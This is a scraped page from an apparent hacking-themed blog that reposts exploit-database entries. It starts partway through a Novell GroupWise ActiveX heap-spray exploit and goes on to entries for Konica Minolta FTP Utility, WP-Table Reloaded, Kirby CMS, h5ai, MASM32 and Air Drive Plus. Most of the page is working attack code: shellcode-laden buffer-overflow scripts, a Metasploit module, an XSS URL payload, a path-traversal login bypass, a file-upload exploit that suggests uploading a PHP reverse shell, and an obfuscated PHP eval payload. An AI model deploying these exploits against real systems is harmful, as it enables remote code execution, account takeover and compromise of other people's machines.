    source: https://www.securityfocus.com/bid/57657/info Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities. A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer. The following versions are vulnerable: Versions prior to 8.0.3 Hot Patch 2 Versions prior to GroupWise 2012 SP1 Hot Patch 1 <!-- (c)oded by High-Tech Bridge Security Research Lab --> <!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled --> <html> <Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title> <object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object> <script language='javascript'> function GyGguPonxZoADbtgXPS() { } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) { this.maxAlloc = (maxAlloc ? maxAlloc : 65535); this.heapBase = (heapBase ? heapBase : 0x150000); this.KJZFzfumaV = "AAAA"; while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) { this.KJZFzfumaV += this.KJZFzfumaV; } this.mem = new Array(); this.AocZkxOTvEXwFTsIPMSanrManzYrte(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) { void(Math.atan2(0xbabe, msg)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) { if (enable == true) void(Math.atan(0xbabe)); else void(Math.asin(0xbabe)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) { void(Math.acos(0xbabe)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) { if (len > this.KJZFzfumaV.length) throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available"; return this.KJZFzfumaV.substr(0, len); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) { if (UWzqrDQwReXOllGssMYEzruQtomLp == 0) throw "Round argument cannot be 0"; return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp; } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width) { var digits = "0123456789ABCDEF"; var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1); while (num > 0xF) { num = num >>> 4; beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg; } var width = (width ? width : 0); while (beTBwoiJGBBhwyZg.length < width) beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg; return beTBwoiJGBBhwyZg; } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) { return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if ((size & 0xf) != 0) throw "Allocation size " + size + " must be a multiple of 16"; if (this.mem[tag] === undefined) this.mem[tag] = new Array(); if (typeof arg == "string" || arg instanceof String) { this.mem[tag].push(arg.substr(0, arg.length)); } else { this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2)); } } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) { delete this.mem[tag]; CollectGarbage(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() { this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache"); this.SWc("oleaut32"); for (var i = 0; i < 6; i++) { this.nPdkLCpaz(32, "oleaut32"); this.nPdkLCpaz(64, "oleaut32"); this.nPdkLCpaz(256, "oleaut32"); this.nPdkLCpaz(32768, "oleaut32"); } } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if (size == 32 || size == 64 || size == 256 || size == 32768) throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache"; this.nPdkLCpaz(arg, tag); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) { this.SWc(tag); this.AocZkxOTvEXwFTsIPMSanrManzYrte(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() { this.mNhbOXqosTNKjGhfj("Running the garbage collector"); CollectGarbage(); this.AocZkxOTvEXwFTsIPMSanrManzYrte(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) { var count = (count ? count : 1); for (var i = 0; i < count; i++) { this.uYiBaSLpjlOJJdhFAb(arg); this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR"); } this.uYiBaSLpjlOJJdhFAb(arg); this.K("ZsJjplNR"); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if ((size & 0xf) != 0) throw "Allocation size " + size + " must be a multiple of 16"; if (size+8 >= 1024) throw("Maximum WbjLbPsZ block size is 1008 bytes"); var count = (count ? count : 1); for (var i = 0; i < count; i++) this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ"); this.K("WbjLbPsZ"); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if ((size & 0xf) != 0) throw "Allocation size " + size + " must be a multiple of 16"; if (size+8 >= 1024) throw("Maximum WbjLbPsZ block size is 1008 bytes"); return this.heapBase + 0x688 + ((size+8)/8)*48; } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) { var size = (size ? size : 1008); if ((size & 0xf) != 0) throw "Vtable size " + size + " must be a multiple of 16"; if (shellcode.length*2 > size-138) throw("Maximum shellcode length is " + (size-138) + " bytes"); var udIUhjCc = unescape("%u9090%u7ceb") for (var i = 0; i < 124/4; i++) udIUhjCc += this.RBRfbU(jmpecx); udIUhjCc += unescape("%u0028%u0028") + shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length); return udIUhjCc; } var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000); var payload2 = unescape( "%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" + "%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" + "%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" + "%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" + "%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" + "%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" + ""); var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090"); while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM; offset_length = 0x5F6; junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length); var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(2, 0x40000 - 0x21); for (var i=0; i < 250; i++) { heap_obj.uYiBaSLpjlOJJdhFAb(block); } ctrl.InvokeContact(202116108) </script> </html>
  17. HireHackking

    Konica Minolta FTP Utility 1.0 - Remote Command Execution

    HireHackking posted a blog entry in Hacker Technology
    # Title: Konica Minolta FTP Utility - Remote Command Execution # Date : 20/09/2015 # Author: R-73eN # Software: Konica Minolta FTP Utility v1.0 # Tested: Windows XP SP3 # Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip # Every command is vulnerable to buffer overflow. import socket import struct shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f" shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29" shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f" shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3" shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92" shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe" shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3" shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a" shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff" shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9" shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18" shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc" shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60" shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba" shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53" shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a" shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3" shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65" banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner nSEH = "\xEB\x13\x90\x90" SEH = struct.pack('<L',0x1220401E) evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server = raw_input('Enter IP : ') s.connect((server, 21)) a = s.recv(1024) print ' [+] ' + a s.send('User ' + evil ) print '[+] https://www.infogen.al/ [+]'
  18. HireHackking

    Konica Minolta FTP Utility 1.00 - (Authenticated) CWD Command Overflow (SEH) (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow', 'Description' => %q{ This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. }, 'Author' => [ 'Shankar Damodaran', # stack buffer overflow dos p.o.c 'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'EBD', '37908' ] ], 'Privileged' => false, 'Payload' => { 'Space' => 1500, 'BadChars' => "\x00\x0a\x2f\x5c", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 SP1 x86', { 'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll 'Offset' => 1037 } ] ], 'DisclosureDate' => 'Aug 23 2015', 'DefaultTarget' => 0)) end def check connect disconnect if banner =~ /FTP Utility FTP server \(Version 1\.00\)/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit connect_login buf = rand_text(target['Offset']) buf << generate_seh_record(target.ret) buf << payload.encoded buf << rand_text(3000) print_status("Sending exploit buffer...") send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string handler disconnect end end
  19. HireHackking

    WordPress Plugin WP-Table Reloaded - 'id' Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/57664/info The WP-Table Reloaded plugin for WordPress is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WP-Table Reloaded versions prior to 1.9.4 are vulnerable. http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
  20. HireHackking

    Kirby CMS 2.1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    ============================================= - Release date: 14.09.2015 - Discovered by: Dawid Golunski - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- Kirby CMS <= 2.1.0 Authentication Bypass via Path Traversal II. BACKGROUND ------------------------- - Kirby CMS "Kirby is a file‑based CMS Easy to setup. Easy to use. Flexible as hell." http://getkirby.com/ III. INTRODUCTION ------------------------- KirbyCMS has a vulnerability that allows to bypass authentication in a hosting environment where users within the same shared environment can save/read files in a directory accessible by both the victim and the attacker. IV. DESCRIPTION ------------------------- As KirbyCMS is a file based CMS, it also stores authentication data within files in accounts directory, each user has its own password file such as: kirby/site/accounts/[username].php At login, KirbyCMS refer to the password file to verify the passwor hash. During the process, it fails to validate the resulting path to ensure that it does not contain path traversal sequences such as '../' within the login variable provided by a user. This makes it vulnerable to a path traversal attack and allows to bypass the authentication if an attacker is located in the same multi-user hosting environment and can write files to a public directory such as /tmp accessible by the victim site with KirbyCMS. The exact code responsible for this vulnerability is located in kirby/core/user.php file and is shown below: ---[ kirby/core/user.php ]--- abstract class UserAbstract { protected $username = null; protected $cache = array(); protected $data = null; public function __construct($username) { $this->username = str::lower($username); // check if the account file exists if(!file_exists($this->file())) { throw new Exception('The user account could not be found'); } ... } protected function file() { return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php'; } ----------------------------- In addition to the authentication bypass KirbyCMS was found to allow authentication over HTTP protocol (resulting in passwords being sent unencrypted), and to never expire authenticated sessions. V. PROOF OF CONCEPT ------------------------- KirbyCMS stores credentials in: kirby/site/accounts directory as PHP files to prevent the contents from being accessed directly via the web server. An example file with credentials looks as follows: ---[ victimuser.php ]--- <?php if(!defined('KIRBY')) exit ?> username: victim email: victim@mailserver.com password: > $2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC language: en role: admin ------------------------ To bypass the authentication an attacker who has an account in the same hosting environment as the victim can write the above credentials file containing an encrypted hash of the password: trythisout into a public directory such as: /tmp/bypassauth.php Because of the aformentioned Path Traversal vulnerability the attacker can use such credentials and log in as an administrator (via: http://victim-server.com/kirby/panel/login) with: Username: ../../../../../../../../tmp/bypassauth Password: trythisout which will produce a HTTP POST request similar to: POST /kirby/panel/login HTTP/1.1 Host: victim_kirby_site Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6... Content-Length: 149 username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1... This will cause KirbyCMS to load credentials from the path: /sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php As a result, the attacker will get the following response: <h2 class="hgroup hgroup-single-line cf"> <span class="hgroup-title"> <a href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account</a> </span> <span class="hgroup-options shiv shiv-dark shiv-left"> getting access to the KirbyCMS control panel with admin rights. VI. BUSINESS IMPACT ------------------------- Users who make use of vulnerable versions of KirbyCMS in shared hosting environments are at risk of having their website modified by unauthorized users. An attacker who manages to log in as an administrator will be able to change all the existing content as well as upload new files. This attack could be combined with the: 'CSRF Content Upload and PHP Script Execution' vulnerability, also discovered by Dawid Golunski and described in a separate document. VII. SYSTEMS AFFECTED ------------------------- The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable. To exploit the vulnerability an attacker must be able to write a malicious credentials file on the system in a public directory that is accessible by the victim KirbyCMS site. This is a common situation on many hosting environments that allow to write/read files from temporary directories such as /tmp, /var/tmp etc. Such file could potentially also be uploaded by other means, even if the attacker does not have an account on the same server, such as anonymous FTP , an email attachment which gets saved in a tmp file on the server etc. VIII. SOLUTION ------------------------- Upgrade to the patched version 2.1.1 released by the vendor upon this advisory. IX. REFERENCES ------------------------- http://legalhackers.com http://legalhackers.com/advisories/KirbyCMS-Path-Traversal-Authentication-Bypass-Vulnerability.txt http://getkirby.com/ http://seclists.org/fulldisclosure/2015/Sep/index.html http://www.securiteam.com/ X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com legalhackers.com XI. REVISION HISTORY ------------------------- 14.09.2015 - Final XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
  21. HireHackking

    h5ai < 0.25.0 - Unrestricted Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python # Exploit Title: h5ai < 0.25.0 Unrestricted File Upload # Date: 21 September 2015 # Exploit Author: rTheory # Vendor Homepage: https://larsjung.de/h5ai/ # Vulnerable Software Link: https://web.archive.org/web/20140208063613/http://release.larsjung.de/h5ai/h5ai-0.24.0.zip # Vulnerable Versions: 0.22.0 - 0.24.1 # Tested on: 0.24.0 running on Apache # CVE : 2015-3203 import urllib import urllib2 import socket import os import getopt import sys # Globals with default options url = '' path = '/' fileName = '' filePath = '' verboseMode = False def header(): print '+-----------------------------------------------+' print '| File upload exploit for h5ai v0.22.0 - 0.24.1 |' print '| See CVE-2015-3203 for vulnerability details |' print '+------------------- rTheory -------------------+' def usage(): print print 'Usage: %s -t target_url -f upload_file' % os.path.basename(__file__) print '-t --target - The URL to connect to' print ' ex: http://example.com' print '-f --file - The file to upload' print ' ex: php-reverse-shell.php' print '-p --path - The path to upload to' print ' Default is \'/\'' print '-v --verbose - Enable more verbose output' print print 'Examples:' print '%s -t http://example.com:8080 -f php-reverse-shell.php' % os.path.basename(__file__) print '%s -t http://192.168.1.100 -f php-reverse-shell.php -p /dir/' % os.path.basename(__file__) sys.exit(0) def main(): global url global path global fileName global filePath global verboseMode header() if not len(sys.argv[4:]): print '[-] Incorrect number of arguments' usage() try: opts, args = getopt.getopt(sys.argv[1:],"ht:f:p:v", ["help","target","file","path","verbose"]) except getopt.GetoptError as err: print str(err) usage() for o,a in opts: if o in ('-h','--help'): usage() elif o in ('-t','--target'): url = a elif o in ('-f','--file'): fileName = a elif o in ('-p','--path'): path = a elif o in ('-v','--verbose'): verboseMode = True else: assert False,"Unhandled Option" # Test target URL, target file, and path inputs for validity if not url.startswith('http'): print '[-] Error: Target URL must start with http:// or https://' usage() if not os.path.isfile(fileName): print '[-] Error: File does not appear to exist' usage() if not (path.startswith('/') and path.endswith('/')): print '[-] Error: Path must start and end with a \'/\'' usage() # Determine target host, which is the URL minus the leading protocol if url.find('http://') != -1: host = url[7:] elif url.find('https://') != -1: host = url[8:] else: host = url # Store the contents of the upload file into a string print '[+] Reading upload file' f = open(fileName,'r') fileContents = f.read() f.close() MPFB = 'multipartformboundary1442784669030' # constant string used for MIME info # Header information. Content-Length not needed. http_header = { "Host" : host, "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0", "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language" : "en-us,en;q=0.5", "Accept-Encoding" : "gzip, deflate", "Content-type" : "multipart/form-data; boundary=------" + MPFB, "X-Requested-With" : "XMLHttpRequest", "Referer" : url + path, "Connection" : "keep-alive" } # POST parameter for file upload payload = '--------'+MPFB+'\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n' payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="href"\r\n\r\n'+path+'\r\n' payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="userfile"; filename="'+fileName+'"\r\nContent-Type: \r\n\r\n'+fileContents+'\r\n' payload += '--------'+MPFB+'--\r\n' socket.setdefaulttimeout(5) opener = urllib2.build_opener() req = urllib2.Request(url, payload, http_header) # submit request and print output. Expected: "code 0" try: print '[+] Sending exploit POST request' res = opener.open(req) html = res.read() if verboseMode: print '[+] Server returned: ' + html except: print '[-] Socket timed out, but it might still have worked...' # close the connection opener.close() # Last step: check to see if the file uploaded (performed outside of this function) filePath = url + path + fileName print '[+] Checking to see if the file uploaded:' print '[+] ' + filePath def postCheck(): # Check to see if the file exists # This may work now that everything from main() was torn down global filePath try: urllib2.urlopen(filePath) print '[+] File uploaded successfully!' except urllib2.HTTPError, e: print '[-] File did not appear to upload' except urllib2.URLError, e: print '[-] File did not appear to upload' main() postCheck()
  22. HireHackking

    MASM32 11R - Crash (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # EXPLOIT TITLE: Masm32v11r Buffer Overflow(SEH overwrite) crash POC # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Date of Testing: 22nd September 2015 # Download Link : http://www.masm32.com/masmdl.htm # Tested On : Windows 10 # Steps to Crash :- # Step 1: Execute this python script # Step 2: This script will create a file called MASM_crash.txt # Step 3: Now open Masm32's QUICK EDITOR # Step 4: Go to Script > 'Convert Text to Script' # Step 5: Open the MASM_crash.txt to convert # Step 6: That should crash the program . file = open('MASM_crash.txt' , 'w'); buffer = "A"*4676 + "B"*4 + "C"*4 + "D"*500 file.write(buffer); file.close()
  23. HireHackking

    Air Drive Plus 2.4 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    Document Title: =============== Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1597 Release Date: ============= 2015-09-21 Vulnerability Laboratory ID (VL-ID): ==================================== 1597 Common Vulnerability Scoring System: ==================================== 8.7 Product & Service Introduction: =============================== Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required. (Copy of the Vendor Homepage: https://itunes.apple.com/tr/app/air-drive-plus-your-file-manager/id422806570 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-09-21: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Y.K. YING Product: Air Drive Plus - iOS Mobile (Web-Application) 2.4 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ An arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web-application. The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload by usage of the wifi interface or local file sync function. Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7. Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege web-application user account. Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Module(s): [+] Upload Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:8000/) Proof of Concept (PoC): ======================= The arbitrary file upload web vulnerability can be exploited by remote attacker without privilege web-application user acocunt or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC Payload(s): http://localhost:8000/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png PoC: Source (Upload File) <tbody id="files"><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_ROOTLV")">.</a></td></tr><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_UPPERLV")">..</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/68-2.png">68-2.png</a></td><td>24,27KB</td><td align="center">2015-09-11 13:13:25</td><td align="center"><a onclick="javascript:delfile("68-2.png");" class="transparent_button">Delete</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]">2.png</a></td><td>538,00B</td><td align='center'>2015-09-11 13:17:21</td><td align='center'><a onclick='javascript:delfile("%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png");' class='transparent_button'>Delete</a></td></tr></tbody></table></iframe></a></td></tr></tbody> --- PoC Session Logs [POST] --- Status: pending[] POST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown] Request Header: Host[localhost:8000:8000] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8000/index_files.html] POST-Daten: POST_DATA[-----------------------------52852184124488 Content-Disposition: form-data; name="uploadfile"; filename="<?php //Obfuscation provided by BKM - PHP Obfuscator v2.47: $kda1640d3bfb="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($kda1640d3bfb( "JGU3NTJiNzQxMTZhYzYwMjUzMDFiYWNlOGUwZTA2YmNiPSJc ... ... ...2MVx4MzhcNjJceDMwXDY3XHgzOFw2M1x4MzlcNjBceDM3XDE0Mlx4MzZcNjdceDM5XDE0NFx4MzVcMTQzXHg2Nlw xNDZceDY1XDYzXHgzN1wxNDEiKT8kYjdkOTFjZDYwMzJlNDRiNDgzY2Y5MGRhOWM4ZmI1MDAoKTokdTZiZmM2YmN jZjRiMjk4ZDkyZTQzMzFhMzY3MzllMjAoKTs=")); ?> 2.png" Content-Type: image/png Status: 200[OK] GET http://localhost:8000/a[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown] Request Header: Host[localhost:8000] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8000/index_files.html] Reference(s): http://localhost:8000/index_files.html http://localhost:8000/AirDriveAction_file_add/ http://1localhost:8000/AirDriveAction_file_show/ Security Risk: ============== The security risk of the arbitrary file upload web vulnerability in the filename value is estimated as high. (CVSS 8.7) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 